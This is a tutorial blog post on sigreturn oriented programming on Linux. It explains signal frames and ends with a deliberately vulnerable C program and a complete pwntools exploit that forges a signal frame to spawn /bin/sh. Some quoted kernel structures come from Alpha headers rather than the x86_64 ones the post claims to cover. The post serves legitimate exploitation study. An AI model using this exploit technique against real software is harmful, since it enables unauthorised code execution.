Sigreturn Oriented Programming
Throughout the years, there have been a multitude of techniques which arose to take advantage of and exploit various mechanisms present within software. One such technique takes advantage of the signal handling routine of Unix based operating systems to gain arbitrary code execution.
Within this post, I will be covering the technique known as sigreturn oriented programming, as well as various properties it possesses which allows us to construct a weird machine. I will elaborate on this term, as well as the technique at a later point within this post, but first we need to gain a fundamental understanding of what signals are and their implementation within Unix based systems.
Signal Handling
So what are signals, how do they work and what purpose do they serve?
We can consider signals as a mechanism for interprocess communication for the various events or requests. It is a software interrupt which is asynchronously delivered to a process to indicate a specific event.
An important distinction to take note of are the limitations of signals as opposed to other forms of IPC. We can think of each signal as a flag of sorts to indicate an event or behavior. We can also implement our own signal handler programatically which allows us to execute our own callbacks.
The following is a list of the signals supported by the Posix Standard, as well as a brief description of their functionality. Its not important to know each of these, but its good to keep a reference in the scenario that one of these signals are encountered. This section is from the man page of signal(7).
Manual page signal(7)
Signal Standard Action Comment
────────────────────────────────────────────────────────────────────────
SIGABRT P1990 Core Abort signal from abort(3)
SIGALRM P1990 Term Timer signal from alarm(2)
SIGBUS P2001 Core Bus error (bad memory access)
SIGCHLD P1990 Ign Child stopped or terminated
SIGCLD - Ign A synonym for SIGCHLD
SIGCONT P1990 Cont Continue if stopped
SIGEMT - Term Emulator trap
SIGFPE P1990 Core Floating-point exception
SIGHUP P1990 Term Hangup detected on controlling terminal
or death of controlling process
SIGILL P1990 Core Illegal Instruction
SIGINFO - A synonym for SIGPWR
SIGINT P1990 Term Interrupt from keyboard
SIGIO - Term I/O now possible (4.2BSD)
SIGIOT - Core IOT trap. A synonym for SIGABRT
SIGKILL P1990 Term Kill signal
SIGLOST - Term File lock lost (unused)
SIGPIPE P1990 Term Broken pipe: write to pipe with no
readers; see pipe(7)
SIGPOLL P2001 Term Pollable event (Sys V);
synonym for SIGIO
SIGPROF P2001 Term Profiling timer expired
SIGPWR - Term Power failure (System V)
SIGQUIT P1990 Core Quit from keyboard
SIGSEGV P1990 Core Invalid memory reference
SIGSTKFLT - Term Stack fault on coprocessor (unused)
SIGSTOP P1990 Stop Stop process
SIGTSTP P1990 Stop Stop typed at terminal
SIGSYS P2001 Core Bad system call (SVr4);
see also seccomp(2)
SIGTERM P1990 Term Termination signal
SIGTRAP P2001 Core Trace/breakpoint trap
SIGTTIN P1990 Stop Terminal input for background process
SIGTTOU P1990 Stop Terminal output for background process
SIGUNUSED - Core Synonymous with SIGSYS
SIGURG P2001 Ign Urgent condition on socket (4.2BSD)
SIGUSR1 P1990 Term User-defined signal 1
SIGUSR2 P1990 Term User-defined signal 2
SIGVTALRM P2001 Term Virtual alarm clock (4.2BSD)
SIGXCPU P2001 Core CPU time limit exceeded (4.2BSD);
see setrlimit(2)
SIGXFSZ P2001 Core File size limit exceeded (4.2BSD);
see setrlimit(2)
SIGWINCH - Ign Window resize signal (4.3BSD, Sun)
When we want to send a signal to a process, we utilize the system call kill
.
As not all signals are meant to signify the termination of a process, the naming convention for the system call can be a bit confusing. The reasoning behind this is the fact that the kill system call was initially introduced during early development of Unix, at which time the purpose of signals were primarily to kill processes.
Over time various other signals were implemented into Unix, so the name is retained for backwards compatability with earlier versions of Unix.
When the kernel delivers a signal, it must first perform a (signal) context-switch before it can execute the signal handler (this is not to be confused with the context-switch from user to kernel space due to the system call). The kernel will store the current state and context of the process and write it to the stack in the form of a runtime signal frame structure. We will explore this structure later on due to its relevance in the exploitation of the signal handling mechanism.
However, if the signal handler resides within user space, why is there a need for a context switch?
This is due to the fact that signals are an asynchronous operation, meaning that we cant simply execute a signal handler like we would any other subroutine. Signals need to be handled at the point in time that they are delivered.
Once this frame has stored the context of the execution for the running process on the stack, the process then executes the signal handler. If control returns back from the handler to the process, the function sigreturn will be called and the the context of the process is restored and continues exection.
A more detailed sequence of events is depicted as follows.
- Send a signal to a process via kill system call, interrupts or some other form of interprocess communication.
- Kernel initially handles the request for a signal to be delivered to a process by calling do_signal. This function is responsible for handling the initial processing of the signal as well as validating permissions and validity of the signal.
- Then the kernel will call the function handle_signal, which determines how the signal should be handled. If there has been a custom signal handler implemented programatically by the developer, it will then prepare the call this handler. Else it will execute its default operation and terminate the process.
- In the scenario in which there is a signal handler implemented, setup_frame will be called. This function saves the current execution context of the process on the stack.
- After this, the kernel will transfer control flow over to the signal handler. An important thing to keep in mind is the fact that the execution of the signal handler is done within the same process environment. We cannot execute user land code in the kernel due to SMAP/SMEP; it would not make sense to either.
Once the signal handler has finished executing, we need some mechanism which restores the previous execution context and resumes the running process. The following is a high level sequence of events which allows for this.
- When a signal handler is finished executing, the system call sigreturn will be invoked.
- A context switch is performed from user space into kernel space due to the system call. The kernel is now responsible for restoring the previous execution context stored on the user space stack.
- Once the process state is restored, the kernel transfers control back to the process and resumes execution.
Signal Frame Structure
Let’s take a closer look into the exact structures involved with signal handling, more
specifically, struct rt_sigframe
. This is the structure which contains the current
execution context of the running process. The runtime signal frame is stored on the
user land stack; which allows for malicious crafted input to forge a frame if they have
enough control over the stack.
The following is the definition of the runtime signal frame structure. Keep in mind that the structure is heavily architecture dependent. I will only be covering the structure for modern x86_64 linux systems.
https://elixir.bootlin.com/linux/latest/source/arch/x86/include/asm/sigframe.h#L57
struct rt_sigframe {
char __user *pretcode;
struct ucontext uc;
struct siginfo info;
/* fp state follows here */
};
The first field for this structure is char __user *pretcode
, which essentially holds the
return address for the signal handler. Once the handler has finished executing, it will
jump to the address present in this field. Keep in mind that the __user
macro denotes
an address in user space.
If we view the value at runtime, we can see that it is populated with the address of
the symbol __restore_rt
. The following is the disassembly of the function within
libc.
pwndbg> x/2i 0x00007ffff7de6ab0
0x7ffff7de6ab0 <__restore_rt>: mov rax,0xf
0x7ffff7de6ab7 <__restore_rt+7>: syscall
pwndbg>
The code stub simply invokes the sigreturn system call. When the signal handler returns, it will execute sigreturn to restore and resume execution context for the running process. As previously explained, sigreturn will be responsible for this operation.
The next field struct ucontext uc
expands into the following structure.
https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/asm/ucontext.h#L5
#ifndef _ASMAXP_UCONTEXT_H
#define _ASMAXP_UCONTEXT_H
struct ucontext {
unsigned long uc_flags;
struct ucontext *uc_link;
old_sigset_t uc_osf_sigmask;
stack_t uc_stack;
struct sigcontext uc_mcontext;
sigset_t uc_sigmask; /* mask last for extensibility */
};
#endif /* !_ASMAXP_UCONTEXT_H */
This structure stores the user context for the running process. The following is a brief description for each of the structure fields.
- struct ucontext
- uc_flags: stores flags which indicate the current status of the execution context.
- uc_link: pointer to an execution context which should be resumed when the current context completes, used for context switching and thread scheduling.
- uc_osf_sigmask: this field stores the process signal mask. the collection of signals which are currently blocked is known as the signal mask.
- uc_stack: the stack used by the current signal context.
- uc_mcontext: this structure contains a machine architecture specific snapshot of the execution context.
- uc_sigmask: contains the signal mask within the context, same as the uc_osf_sigmask field.
Let’s take a look at this structure at runtime and examine each of it’s fields.
pwndbg> p *(struct ucontext_t*) 0x7fffffffd680
$10 = {
uc_flags = 7,
uc_link = 0x0,
uc_stack = {
ss_sp = 0x0,
ss_flags = 2,
ss_size = 0
},
uc_mcontext = {
gregs = {140737488346224, 140737353936240, 8, 514, 0,
140737488346712, 140737354125312, 93824992247256, 2,
140737488345728, 140737488346416, 140737488346696, 0, 0,
140737351936899, 140737488346400, 93824992235913, 518,
12103423998558259, 0, 3, 0, 0},
fpregs = 0x7fffffffd840,
__reserved1 = {3, 140733193388032, 140737488345096,140737488345092,
0, 0, 140737353919659, 4160530904}
},
uc_sigmask = {
__val = {0, 140737488345304, 93824992232647, 140737354131016,
140737353708968, 140737354130112,
466005475, 140737488345344, 140737353958056, 1, 140737353708968,
1, 0, 1, 140737354130112, 140737354131016}
},
__fpregs_mem = {
cwd = 55416,
swd = 65535,
ftw = 32767,
fop = 0,
rip = 140733193388033,
rdp = 140737488345216,
mxcsr = 895,
mxcr_mask = 0,
_st = {{
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {8064, 0, 65535, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}},
_xmm = {{
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {2, 0, 14, 2147483648}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}},
__glibc_reserved1 = {0, 0, 0, 0, 0, 0,
4294957584, 32767, 4160572646, 32767, 4158322872, 32767,
4160694051, 32767, 4160319488, 32767, 110527148, 0, 1179670611,
1092, 31, 0, 1088, 0}
},
__ssp = {0, 0, 0, 3}
}
The primary portion of the user context structure is held within the field
struct sigcontext uc_mcontext
. This structure holds the registers and execution state
of the saved execution state. What follows is the definition of the structure.
https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/uapi/asm/sigcontext.h#L5
#ifndef _ASMAXP_SIGCONTEXT_H
#define _ASMAXP_SIGCONTEXT_H
struct sigcontext {
/*
* What should we have here? I'd probably better use the same
* stack layout as OSF/1, just in case we ever want to try
* running their binaries..
*
* This is the basic layout, but I don't know if we'll ever
* actually fill in all the values..
*/
long sc_onstack;
long sc_mask;
long sc_pc;
long sc_ps;
long sc_regs[32];
long sc_ownedfp;
long sc_fpregs[32];
unsigned long sc_fpcr;
unsigned long sc_fp_control;
unsigned long sc_reserved1, sc_reserved2;
unsigned long sc_ssize;
char * sc_sbase;
unsigned long sc_traparg_a0;
unsigned long sc_traparg_a1;
unsigned long sc_traparg_a2;
unsigned long sc_fp_trap_pc;
unsigned long sc_fp_trigger_sum;
unsigned long sc_fp_trigger_inst;
};
#endif
Keep in mind that the implementation of this structure (as well as various others) will differ from platform and architecture to meet specific requirements.
Let’s take a look at this structure at runtime to view the specific contents of each saved register.
pwndbg> p*(struct sigcontext *)(*(struct ucontext_t*)0x7fffffffd680).uc_mcontext
$9 = {
r8 = 0,
r9 = 0,
r10 = 3849470367813,
r11 = 3848290698112,
r12 = 3848290698112,
r13 = 3848290698112,
r14 = 3848290698112,
r15 = 3848290698112,
rdi = 3848290698112,
rsi = 3848290698112,
rbp = 2,
rbx = 9223372036854775822,
rdx = 0,
rax = 0,
rcx = 0,
rsp = 0,
rip = 0,
eflags = 0,
cs = 0,
gs = 0,
fs = 0,
__pad0 = 0,
err = 3216465788709089792,
trapno = 1,
oldmask = 93824992235913,
cr2 = 140737488346696,
{
fpstate = 0x1f7ffdab0,
__fpstate_word = 8455707312
},
__reserved1 = {1, 140737351845968, 140737488346672,
93824992235878, 5726617664, 140737488346696,
140737488346696, 10445461255472785543}
}
pwndbg>
Now let’s view the last field present within the runtime signal frame struct siginfo info
.
This field holds various information about the signal which was delivered to the process.
The following is the expanded definition of the structure.
typedef struct siginfo {
union {
struct {
int si_signo;
int si_errno;
int si_code;
union __sifields _sifields;
}
int _si_pad[SI_MAX_SIZE/sizeof(int)];
};
} __attribute__((aligned(8))) siginfo_t;
The first field si_signo
holds the signal number or type which the signal represents. The
next field si_errno
may potentially hold an error code if the signal was generated due
to an error condition. The field si_code
provides additional information about the specific
event which triggered the signal. The usage of this field depends on the type of signal.
The field _sifields
is a union which typically contains various information on the sender’s
process and user identifier. I will not be elaborating nor expanding on this structure as
its not relevant.
Sigreturn Oriented Programming
The technique known as srop exploits the signal handling mechanism due to the fact that the execution context is stored on the user space stack; and there is no means of verifying whether a runtime signal frame is legitimate.
Thanks to this, an attacker can with enough control over the stack can forge a malicious runtime signal frame for the kernel to load. There are a few means of achieving this technique, but we need the ability to invoke the sigreturn system call. We can do this via several means.
One such method is via return oriented programming. If there is a syscall
rop gadget
present within the binary and we can control the ax register, we can leverage it to
invoke sigreturn.
On older versions of linux, there also exists a sigreturn gadget which is present at a fixed kernel page. This was mapped into user space processes in the form of vDSO as an optimization for system calls. This virtual system call mechanism has been deprecated in newer versions of linux.
Using this technique, we can leverage the signal handling routine to populate each and every register with whatever value we want. The following is a vulnerable program in which we will exploit using srop.
// gcc -w -static -no-pie -fno-stack-protector -o vuln vuln.c
#include <stdio.h>
#include <unistd.h>
int foo(char* buffer) {
return read(0, buffer, 1024);
}
int main(int argc, char** argv) {
char buffer[128];
printf("Bytes read into buffer: %d\n", foo((char *)&buffer));
puts("Good luck on calling /bin/sh");
return 0;
}
For the sake of simplicity, we will compile the binary statically and without position
independent code (PIE). This allows us to use the __restore_rt
gadget to call sigreturn,
which would typically be held within libc; as well as access to the string /bin/sh
. It
makes the example much easier to comprehend and work with as we wont have to worry about
gaining leaks and calculating offsets.
We will also disable the stack canary as we need to be able to write over the stack to forge our fake runtime signal frame. Keep in mind that we dont actually need to send a signal, we can just craft a fake frame then invoke sigreturn to restore the current execution context with our fake signal frame.
The last little cheat that the program provides us is the /bin/sh\x00
string. As this
string is no longer present in recent versions of statically compiled binaries, simply
using a string within .rodata
would be much easier than having to write our own to
a known writeable region of memory.
What follows is the high level sequence of events taken to gain a shell on the binary.
- Calculate the offset of the return address of the binary.
- Find the address of important addresses of memory, specifically the
/bin/sh
string, the address of the restore_rt symbol for our return address and the address of a syscall gadget for instruction pointer. - Craft a fake signal frame which populates the registers with the appropriate arguments to spawn a shell with execve.
- Craft final payload with padding and forged runtime signal frame.
First and foremost, lets calculate the offset of the return address.
─────────────────────────────[ BACKTRACE ]─────────────────────────────
► f 0 0x401838 main+79
f 1 0x6161616161616172
f 2 0x6161616161616173
f 3 0x6161616161616174
f 4 0x6161616161616175
f 5 0x6161616161616176
f 6 0x6161616161616177
f 7 0x6161616161616178
───────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l raaaaaaa
Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161)
Found at offset 136
pwndbg>
So now we know that the offset is at 136 bytes, the return address should be directly
after this. From here, we need some means of invoking the sigreturn system call. Thankfully
we have the __restore_rt
symbol statically linked within the binary itself so we can
use that as our gadget. Keep in mind, the first field of the signal frame pretcode
effectively serves as the return address.
From here we can populate the values of the signal frame with whatever values we want. In
this case, we can to call execve("/bin/sh", 0, 0)
. Once our registers are populated with
the correct values, we now need to invoke a system call via a syscall
gadget to execute
execve.
When forging a fake signal frame, we need to be careful not to populate various fields with bad values which may potentially corrupt the runtime of our process. There are a few requirements which we need in order to forge a valid frame, they are as follows.
- The code segment (CS) register must be correctly restored, on x86_64 this register
contains the value
0x33
. - The fpstate field should not point to a random pointer and should be null. When this field is null, Linux will assume no floating point operations and will clear the FPU state.
The rest of the fields that were not mentioned were populated with the values shown at runtime by the debugger.
The full exploit code is shown below.
#!/usr/bin/env python3
from pwn import *
p = ELF('vuln', checksec=0).process(env={})
bin_sh = 0x00475020+21
restore_rt = 0x00462170
syscall = 0x00000000004011b8
sigframe = p64(restore_rt) # pretcode (return address)
sigframe += p64(0x0000000000000007) # uc_flags
sigframe += p64(0) # uc_link
sigframe += p64(0) # uc_stack.ss_sp
sigframe += p64(0x0000ffff00000000) # uc_stack.ss_flags
sigframe += p64(0) # uc_stack.ss_size
sigframe += p64(0)*8 # r8-r15
sigframe += p64(bin_sh) # rdi
sigframe += p64(0) # rsi
sigframe += p64(0) # rbp
sigframe += p64(0) # rbx
sigframe += p64(0) # rdx
sigframe += p64(59) # rax
sigframe += p64(0) # rcx
sigframe += p64(0) # rsp
sigframe += p64(syscall) # rip
sigframe += p64(0x0000000000000202) # eflags
sigframe += p64(0x002b000000000033) # ss, fs, gs, cs
sigframe += p64(0) # err
sigframe += p64(1) # trapno
sigframe += p64(0)*3
sigframe += p64(0xe) # reserved
sigframe += p64(0) # uc_sigmask
offset=136
payload = b'A'*offset
payload += sigframe
pause()
p.send(payload)
p.interactive()
Conclusion
In summary, sigreturn oriented programming is a technique typically used to populate registers for the goal of arbitrary code execution by forging a runtime signal frame and exploiting the signal handling mechanism on Unix based systems.
Below is a list of additional resources which I used as a reference while writing this post, I highly recommend going through the original paper on this technique.
Thanks for reading!
Additional Resources
https://www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf
https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf
https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
https://lwn.net/Articles/676803/